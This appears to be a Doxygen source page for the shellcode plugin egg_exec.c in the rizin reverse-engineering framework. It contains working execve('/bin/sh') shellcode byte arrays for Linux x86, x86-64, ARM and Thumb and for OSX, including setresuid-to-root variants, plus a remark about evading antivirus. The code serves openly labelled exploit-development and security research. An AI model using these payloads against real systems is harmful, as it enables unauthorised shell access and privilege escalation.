rz-bindgen/doxygen/egg__exec_8c_source.html

 // SPDX-FileCopyrightText: 2011 pancake <pancake@nopcode.org>

 // SPDX-License-Identifier: LGPL-3.0-only

 #include <rz_egg.h>


 #if 0

 linux setresuid(0,0)+execv(/bin/sh)

 31c031db31c999b0a4cd806a0b5851682f2f7368682f62696e89e35189e25389e1cd80


 SETRESUID: (11 bytes)

 "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80"


 BINSH: (24 bytes) (x86-32/64):

 "\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80";

 #endif


 // XXX: must obfuscate to avoid antivirus

 // OSX

 static ut8 x86_osx_suid_binsh[] =

     "\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17"

     /* suid */ "\x31\xff\x4c\x89\xc0\x0f\x05"

     "\xeb\x12\x5f\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x52"

     "\x57\x48\x89\xe6\x0f\x05\xe8\xe9\xff\xff\xff"

     // CMD

     "\x2f\x62\x69\x6e\x2f\x73\x68";

 static ut8 x86_osx_binsh[] =

     "\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17"

     // SUIDSH "\x31\xff\x4c\x89\xc0\x0f\x05"

     "\xeb\x12\x5f\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x52"

     "\x57\x48\x89\xe6\x0f\x05\xe8\xe9\xff\xff\xff"

     // CMD

     "\x2f\x62\x69\x6e\x2f\x73\x68";


 // linux

 static ut8 x86_linux_binsh[] =

     "\x31\xc0\x50\x68"

     "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" // /bin/sh here

     "\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";


 #if 0

 static ut8 x86_64_linux_binsh[] =

     "\x48\x31\xd2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53"

     "\x48\xc1\xeb\x08\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48\x89\xe6\xb0\x3b"

     "\x0f\x05\x6a\x01\x5f\x6a\x3c\x58\x0f\x05";

 #endif


 static ut8 x86_64_linux_binsh[] =

     "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";


 static ut8 arm_linux_binsh[] =

     "\x02\x20\x42\xe0\x1c\x30\x8f\xe2\x04\x30\x8d\xe5"

     "\x08\x20\x8d\xe5\x13\x02\xa0\xe1\x07\x20\xc3\xe5\x04\x30\x8f\xe2"

     "\x04\x10\x8d\xe2\x01\x20\xc3\xe5\x0b\x0b\x90\xef"

     "\x2f\x62\x69\x6e\x2f\x73\x68"; // "/bin/sh";


 static ut8 thumb_linux_binsh[] =

     "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x0c\x30\xc0\x46\x01\x90"

     "\x49\x1a\x92\x1a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68"; // "/bin/sh";


 static RzBuffer *build(RzEgg *egg) {

     RzBuffer *buf = rz_buf_new_with_bytes(NULL, 0);

     const ut8 *sc = NULL;

     int cd = 0;

     char *shell = rz_egg_option_get(egg, "cmd");

     char *suid = rz_egg_option_get(egg, "suid");

     // TODO: last char must not be \x00 .. or what? :D

     if (suid && *suid == 'f') { // false

         free(suid);

         suid = NULL;

     }

     switch (egg->os) {

     case RZ_EGG_OS_OSX:

     case RZ_EGG_OS_DARWIN:

         switch (egg->arch) {

         case RZ_SYS_ARCH_X86:

             if (suid) {

                 sc = x86_osx_suid_binsh;

                 cd = 7 + 36;

             } else {

                 sc = x86_osx_binsh;

                 cd = 36;

             }

         case RZ_SYS_ARCH_ARM:

             // TODO

             break;

         }

         break;

     case RZ_EGG_OS_LINUX:

         if (suid) {

             eprintf("no suid for this platform\n");

         }

         suid = 0;

         switch (egg->arch) {

         case RZ_SYS_ARCH_X86:

             switch (egg->bits) {

             case 32:

                 sc = x86_linux_binsh;

                 break;

             case 64:

                 sc = x86_64_linux_binsh;

                 if (shell && *shell) {

                     int len = strlen(shell);

                     if (len > sizeof(st64) - 1) {

                         *shell = 0;

                         eprintf("Unsupported CMD length\n");

                         break;

                     }

                     st64 b = 0;

                     memcpy(&b, shell, strlen(shell));

                     b = -b;

                     shell = realloc(shell, sizeof(st64) + 1);

                     if (!shell) {

                         break;

                     }

                     rz_str_ncpy(shell, (char *)&b, sizeof(st64));

                     shell[sizeof(st64)] = 0;

                     cd = 4;

                     rz_buf_set_bytes(buf, sc, strlen((const char *)sc));

                     rz_buf_write_at(buf, cd, (const ut8 *)shell, sizeof(st64));

                     sc = 0;

                 }

                 break;

             default:

                 eprintf("Unsupported arch %d bits\n", egg->bits);

             }

             break;

         case RZ_SYS_ARCH_ARM:

             switch (egg->bits) {

             case 16:

                 sc = thumb_linux_binsh;

                 break;

             case 32:

                 sc = arm_linux_binsh;

                 break;

             default:

                 eprintf("Unsupported arch %d bits\n", egg->bits);

             }

             break;

         }

         break;

     default:

         eprintf("Unsupported os %x\n", egg->os);

         break;

     }


     if (sc) {

         rz_buf_set_bytes(buf, sc, strlen((const char *)sc));

         if (shell && *shell) {

             if (cd) {

                 rz_buf_write_at(buf, cd, (const ut8 *)shell, strlen(shell) + 1);

             } else {

                 eprintf("Cannot set shell\n");

             }

         }

     }

     free(suid);

     free(shell);

     return buf;

 }


 // TODO: rename plugin to run

 RzEggPlugin rz_egg_plugin_exec = {

     .name = "exec",

     .type = RZ_EGG_PLUGIN_SHELLCODE,

     .desc = "execute cmd=/bin/sh suid=false",

     .build = (void *)build

 };


 #ifndef RZ_PLUGIN_INCORE

 RZ_API RzLibStruct rizin_plugin = {

     .type = RZ_LIB_TYPE_EGG,

     .data = &rz_egg_plugin_exec,

     .version = RZ_VERSION

 };

 #endif

len
size_t len
Definition: 6502dis.c:15

bytes
static ut8 bytes[32]
Definition: asm_arc.c:23

cd
static csh cd
Definition: asm_mips_cs.c:10

RZ_API
#define RZ_API
Definition: core_plugin_example.c:36

NULL
#define NULL
Definition: cris-opc.c:27

rz_egg_option_get
RZ_API char * rz_egg_option_get(RzEgg *egg, const char *key)
Definition: egg.c:534

sc
static char sc[]
Definition: egg_cb.c:6

build
static RzBuffer * build(RzEgg *egg)
Definition: egg_exec.c:59

rizin_plugin
RZ_API RzLibStruct rizin_plugin
Definition: egg_exec.c:169

x86_64_linux_binsh
static ut8 x86_64_linux_binsh[]
Definition: egg_exec.c:46

rz_egg_plugin_exec
RzEggPlugin rz_egg_plugin_exec
Definition: egg_exec.c:161

thumb_linux_binsh
static ut8 thumb_linux_binsh[]
Definition: egg_exec.c:55

x86_linux_binsh
static ut8 x86_linux_binsh[]
Definition: egg_exec.c:34

x86_osx_suid_binsh
static ut8 x86_osx_suid_binsh[]
Definition: egg_exec.c:18

x86_osx_binsh
static ut8 x86_osx_binsh[]
Definition: egg_exec.c:25

arm_linux_binsh
static ut8 arm_linux_binsh[]
Definition: egg_exec.c:49

free
RZ_API void Ht_() free(HtName_(Ht) *ht)
Definition: ht_inc.c:130

buf
voidpf void * buf
Definition: ioapi.h:138

ut8
uint8_t ut8
Definition: lh5801.h:11

memcpy
memcpy(mem, inblock.get(), min(CONTAINING_RECORD(inblock.get(), MEMBLOCK, data) ->size, size))

realloc
void * realloc(void *ptr, size_t size)
Definition: malloc.c:144

setresuid
static const char struct stat static buf struct stat static buf static idle const char static path static fd const char static len const void static prot const char struct module static image struct kernel_sym static table unsigned char static buf static fsuid unsigned struct dirent unsigned static count const struct iovec static count static pid const void static len static flags const struct sched_param static p static pid static policy struct timespec static tp setresuid
Definition: sflib.h:184

x86
Definition: test_winkernel.cpp:83

eprintf
#define eprintf(x, y...)
Definition: rlcc.c:7

rz_buf_write_at
RZ_API st64 rz_buf_write_at(RZ_NONNULL RzBuffer *b, ut64 addr, RZ_NONNULL const ut8 *buf, ut64 len)
Write len bytes of the buffer at the specified address.
Definition: buf.c:1197

rz_buf_set_bytes
RZ_API bool rz_buf_set_bytes(RZ_NONNULL RzBuffer *b, RZ_NONNULL const ut8 *buf, ut64 len)
Replace the content of the buffer with the bytes array.
Definition: buf.c:905

rz_buf_new_with_bytes
RZ_API RZ_OWN RzBuffer * rz_buf_new_with_bytes(RZ_NULLABLE RZ_BORROW const ut8 *bytes, ut64 len)
Creates a new buffer with a bytes array.
Definition: buf.c:465

rz_egg.h

RZ_EGG_PLUGIN_SHELLCODE
#define RZ_EGG_PLUGIN_SHELLCODE
Definition: rz_egg.h:19

RZ_EGG_OS_DARWIN
#define RZ_EGG_OS_DARWIN
Definition: rz_egg.h:129

RZ_EGG_OS_OSX
#define RZ_EGG_OS_OSX
Definition: rz_egg.h:128

RZ_EGG_OS_LINUX
#define RZ_EGG_OS_LINUX
Definition: rz_egg.h:127

RZ_LIB_TYPE_EGG
@ RZ_LIB_TYPE_EGG
Definition: rz_lib.h:84

rz_str_ncpy
RZ_API size_t rz_str_ncpy(char *dst, const char *src, size_t n)
Secure string copy with null terminator.
Definition: str.c:923

RZ_SYS_ARCH_X86
@ RZ_SYS_ARCH_X86
Definition: rz_types.h:532

RZ_SYS_ARCH_ARM
@ RZ_SYS_ARCH_ARM
Definition: rz_types.h:533

st64
#define st64
Definition: rz_types_base.h:10

RZ_VERSION
#define RZ_VERSION
Definition: rz_version.h:8

b
#define b(i)
Definition: sha256.c:42

bin
Definition: malloc.c:26

rz_buf_t
Definition: rz_buf.h:43

rz_egg_plugin_t
Definition: rz_egg.h:22

rz_egg_plugin_t::name
const char * name
Definition: rz_egg.h:23

rz_egg_t
Definition: rz_egg.h:93

rz_egg_t::bits
int bits
Definition: rz_egg.h:108

rz_egg_t::arch
int arch
Definition: rz_egg.h:106

rz_egg_t::os
ut32 os
Definition: rz_egg.h:109

rz_lib_struct_t
Definition: rz_lib.h:57

rz_lib_struct_t::type
int type
Definition: rz_lib.h:58